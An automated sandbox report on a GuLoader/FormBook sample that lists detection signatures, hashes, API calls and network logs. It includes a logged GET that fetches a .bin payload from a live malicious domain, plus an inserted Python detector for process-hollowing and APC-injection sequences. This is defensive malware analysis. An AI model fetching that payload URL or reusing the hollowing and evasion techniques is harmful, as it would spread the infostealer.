Windows Analysis Report
SwiftCopy_23052024.exe

Overview

General Information

Sample name: SwiftCopy_23052024.exe
Analysis ID: 1446510
MD5: f8a9b82d69416512778ad72015181036
SHA1: 60013bbc382ad1722fc5be5f72188c57e7a4928d
SHA256: dabc79a064aa9838ad06d11311ff4c72913d9a7e7c1016cc9e12dcc46d474b8a
Tags: exe, signed

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: innovativebuildingsolutions.in Virustotal: Detection: 13%
Source: www.innovativebuildingsolutions.in Virustotal: Detection: 10%
Source: https://www.innovativebuildingsolutions.in/ Virustotal: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Virustotal: Detection: 27%
Source: SwiftCopy_23052024.exe ReversingLabs: Detection: 26%
Source: SwiftCopy_23052024.exe Virustotal: Detection: 27%
Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Joe Sandbox ML: detected
Source: SwiftCopy_23052024.exe Joe Sandbox ML: detected
Source: SwiftCopy_23052024.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 103.21.58.98:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: SwiftCopy_23052024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Tabsgivende.exe, Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbL source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb%B source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004062F0 FindFirstFileA,FindClose, 0_2_004062F0
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004057B5
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: www.innovativebuildingsolutions.in
  Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: www.innovativebuildingsolutions.in
  Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.innovativebuildingsolutions.in
Source: powershell.exe, 00000002.00000002.2194788863.0000000006D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft3m
Source: SwiftCopy_23052024.exe, SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.innovativebuildingsolutions.in/
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2374837467.0000000021E40000.00000004.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361654109.000000000664A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 103.21.58.98:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405252

E-Banking Fraud

Source: Yara match File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562C70 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_22562C70
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562DF0 NtQuerySystemInformation,LdrInitializeThunk, 18_2_22562DF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225635C0 NtCreateMutant,LdrInitializeThunk, 18_2_225635C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22564340 NtSetContextThread, 18_2_22564340
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22564650 NtSuspendThread, 18_2_22564650
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562AD0 NtReadFile, 18_2_22562AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562AF0 NtWriteFile, 18_2_22562AF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562AB0 NtWaitForSingleObject, 18_2_22562AB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562B60 NtClose, 18_2_22562B60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562BF0 NtAllocateVirtualMemory, 18_2_22562BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562BE0 NtQueryValueKey, 18_2_22562BE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562B80 NtQueryInformationFile, 18_2_22562B80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562BA0 NtEnumerateValueKey, 18_2_22562BA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562E30 NtWriteVirtualMemory, 18_2_22562E30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562EE0 NtQueueApcThread, 18_2_22562EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562E80 NtReadVirtualMemory, 18_2_22562E80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562EA0 NtAdjustPrivilegesToken, 18_2_22562EA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562F60 NtCreateProcessEx, 18_2_22562F60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562F30 NtCreateSection, 18_2_22562F30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562FE0 NtCreateFile, 18_2_22562FE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562F90 NtProtectVirtualMemory, 18_2_22562F90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562FB0 NtResumeThread, 18_2_22562FB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562FA0 NtQuerySection, 18_2_22562FA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562C60 NtCreateKey, 18_2_22562C60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562C00 NtQueryInformationProcess, 18_2_22562C00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562CC0 NtQueryVirtualMemory, 18_2_22562CC0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562CF0 NtOpenProcess, 18_2_22562CF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562CA0 NtQueryInformationToken, 18_2_22562CA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562D10 NtMapViewOfSection, 18_2_22562D10
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562D00 NtSetInformationFile, 18_2_22562D00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562D30 NtUnmapViewOfSection, 18_2_22562D30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562DD0 NtDelayExecution, 18_2_22562DD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562DB0 NtEnumerateKey, 18_2_22562DB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563010 NtOpenDirectoryObject, 18_2_22563010
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563090 NtSetValueKey, 18_2_22563090
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225639B0 NtGetContextThread, 18_2_225639B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563D70 NtOpenThread, 18_2_22563D70
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22563D10 NtOpenProcessToken, 18_2_22563D10
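The Nt* routines resolved above are the building blocks of the process hollowing (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) and APC injection (NtWriteVirtualMemory, NtQueueApcThread) that the signatures report. The following Python is an added example, not part of this report and not code from the sample: it keys an API-call trace by (source, target) process pair and flags a pair only once the prerequisite calls and the completing NtResumeThread have all been observed on that same pair. The trace is constructed from the routines listed above; process ids other than 18 (Tabsgivende.exe) are illustrative.

```python
"""Flag process-hollowing and APC-injection call sequences in an API trace.

Added example: not part of the sandbox report and not code from the sample.
The trace below is constructed from the Nt* routines the report resolved in
Tabsgivende.exe (process 18) and mirrors the signatures 'Sample uses process
hollowing technique' and 'Queues an APC in another process'. The process ids
other than 18 are illustrative.
"""
from collections import defaultdict

# technique -> (calls that must already have been seen on the same
# (source, target) process pair, call that completes the technique)
PATTERNS = {
    "process_hollowing": (
        {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread"},
        "NtResumeThread",
    ),
    "apc_injection": (
        {"NtWriteVirtualMemory", "NtQueueApcThread"},
        "NtResumeThread",
    ),
}


def detect(trace):
    """trace: iterable of (source_pid, api_name, target_pid).

    Returns [(technique, source_pid, target_pid)] in completion order.
    Calls are keyed per process pair, so a debugger writing into one child
    cannot complete a pattern another pair started, and calls whose target is
    the caller itself (self-unpacking, JIT) are ignored.
    """
    seen = defaultdict(set)
    hits = []
    for src, api, dst in trace:
        if src == dst:
            continue
        seen[(src, dst)].add(api)
        for name, (required, terminal) in PATTERNS.items():
            if api == terminal and required <= seen[(src, dst)]:
                hit = (name, src, dst)
                if hit not in hits:
                    hits.append(hit)
    return hits


# Constructed trace. For the creation call the target is the pid the new
# (suspended) process received, as a tracer records it after the call returns.
SAMPLE_TRACE = [
    (18, "NtCreateProcessEx", 25),
    (18, "NtUnmapViewOfSection", 25),
    (18, "NtAllocateVirtualMemory", 25),
    (18, "NtWriteVirtualMemory", 25),
    (18, "NtSetContextThread", 25),
    (18, "NtResumeThread", 25),
    (18, "NtOpenProcess", 26),
    (18, "NtAllocateVirtualMemory", 26),
    (18, "NtWriteVirtualMemory", 26),
    (18, "NtQueueApcThread", 26),
    (18, "NtResumeThread", 26),
    (7, "NtWriteVirtualMemory", 9),       # a debugger patching a breakpoint
    (7, "NtResumeThread", 9),
    (12, "NtAllocateVirtualMemory", 12),  # a process allocating in itself
]

if __name__ == "__main__":
    for technique, src, dst in detect(SAMPLE_TRACE):
        print(f"{technique}: pid {src} -> pid {dst}")
```

Requiring the prerequisites on the same process pair is what keeps an ordinary debugger (write plus resume) out of the hits. The report also lists "Found direct / indirect Syscall", so a trace taken from user-mode inline hooks on ntdll can miss exactly these calls; the sandbox's own instrumentation, ETW threat-intelligence events or kernel callbacks are the sources this check should be fed from.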
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447F010 2_2_0447F010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447F8E0 2_2_0447F8E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447ECC8 2_2_0447ECC8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B02C0 18_2_225B02C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA352 18_2_225EA352
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E3F0 18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F03E6 18_2_225F03E6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B8158 18_2_225B8158
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520100 18_2_22520100
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E81CC 18_2_225E81CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F01AA 18_2_225F01AA
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254C6E0 18_2_2254C6E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554750 18_2_22554750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252C7C0 18_2_2252C7C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E2446 18_2_225E2446
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DE4F6 18_2_225DE4F6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F0591 18_2_225F0591
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EAB40 18_2_225EAB40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E6BD7 18_2_225E6BD7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253A840 18_2_2253A840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22532840 18_2_22532840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E8F0 18_2_2255E8F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225168B8 18_2_225168B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22546962 18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225FA9A6 18_2_225FA9A6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530E59 18_2_22530E59
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EEE26 18_2_225EEE26
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EEEDB 18_2_225EEEDB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542E90 18_2_22542E90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ECE93 18_2_225ECE93
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550F30 18_2_22550F30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22572F28 18_2_22572F28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522FC8 18_2_22522FC8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253CFE0 18_2_2253CFE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AEFA0 18_2_225AEFA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530C00 18_2_22530C00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520CF2 18_2_22520CF2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0CB5 18_2_225D0CB5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253AD00 18_2_2253AD00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252ADE0 18_2_2252ADE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22548DBF 18_2_22548DBF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254B2C0 18_2_2254B2C0
